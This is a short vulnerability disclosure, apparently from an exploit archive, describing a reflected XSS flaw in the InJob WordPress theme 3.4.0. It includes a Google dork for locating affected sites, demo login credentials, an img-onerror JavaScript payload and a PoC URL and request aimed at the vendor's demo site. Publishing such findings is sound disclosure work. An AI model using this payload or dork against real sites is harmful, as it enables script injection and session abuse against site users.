[+] Exploit Title: InJob | Multi features for recruitment WordPress Theme v3.4.0 - Authenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/injob/
[+] Date: 2020-07-02
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: InwaveThemes [ http://inwavethemes.com ]
[+] Software Version: 3.4.0
[+] Software Link: https://themeforest.net/item/injob-job-board-wordpress-theme/20322987
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Authenticated Reflected XSS vulnerability was discovered in the InJob theme through 3.4.0 for WordPress.

[i] Demo account: poc_user / vector (login / password)



### [ Payload: ]

[$] "><img src=x onerror=alert(document.domain);window.location=`https://twitter.com/vlad_vector`;>



### [ PoC: ]

[!] http://jobboard.inwavethemes.com/dashboard/?iwj_tab=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain);window.location=`https://twitter.com/vlad_vector`;%3E

[!] GET /dashboard/?iwj_tab=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1
Host: jobboard.inwavethemes.com
Cookie: [cookies_here]



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector